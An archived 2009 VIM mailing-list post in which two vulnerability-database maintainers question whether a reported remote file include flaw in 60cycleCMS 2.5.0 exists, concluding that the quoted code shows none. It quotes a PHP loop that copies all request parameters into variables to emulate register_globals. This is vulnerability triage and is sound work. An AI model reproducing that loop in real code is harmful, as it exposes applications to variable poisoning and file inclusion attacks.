[VIM] 60cycleCMS <= 2.5.0 Remote File Include Exploit
George A. Theall
theall at tenablesecurity.com
Tue Dec 22 21:05:33 UTC 2009
On Dec 22, 2009, at 3:41 PM, Steven M. Christey wrote:
> So I wish I had the direct reference at hand, but I'm pretty sure
> that older PHPs allowed overwriting of $_SERVER variables. How old,
> I'm not sure... I think Stefan Esser did some writeup on this. But
> now I've dug up a 2006 post to VIM where I said the same thing and
> apparently never followed up...
>
> There's always the risk of somebody implementing their own version
> of register_globals and poisoning $_SERVER that way, but the code
> snippet doesn't give enough context.
>
> Ah yes, Stefan saves the day on this last angle:
>
> http://www.suspekt.org/2009/02/06/some-facts-about-the-phplist-vulnerability-and-the-phpbbcom-hack/
To be clear, the problem Esser wrote about involves code that
explicitly copies request parameter values into PHP variables to
emulate PHP's register_globals when that's off:
if (!ini_get("register_globals")
|| ini_get("register_globals") == "off") {
# fix register globals, for now, should be phased out gradually
# sure, this gets around the entire reason that register globals
# should be off, but going through three years of code takes a
long time....
foreach ($_REQUEST as $key => $val) {
$$key = $val;
}
}
>> Code snippet from 2.5.0, which is supposedly affected:
>>
>> // include your sql info file here
>> $root = $_SERVER['DOCUMENT_ROOT'];
>> require "$root/../config.php";
>
> Yeah, I can see how this would raise questions. Code inspection
> would be needed.
Indeed. There's nothing of the sort going on in the code snippet from
60cycleCMS.
George
--
theall at tenablesecurity.com
More information about the VIM
mailing list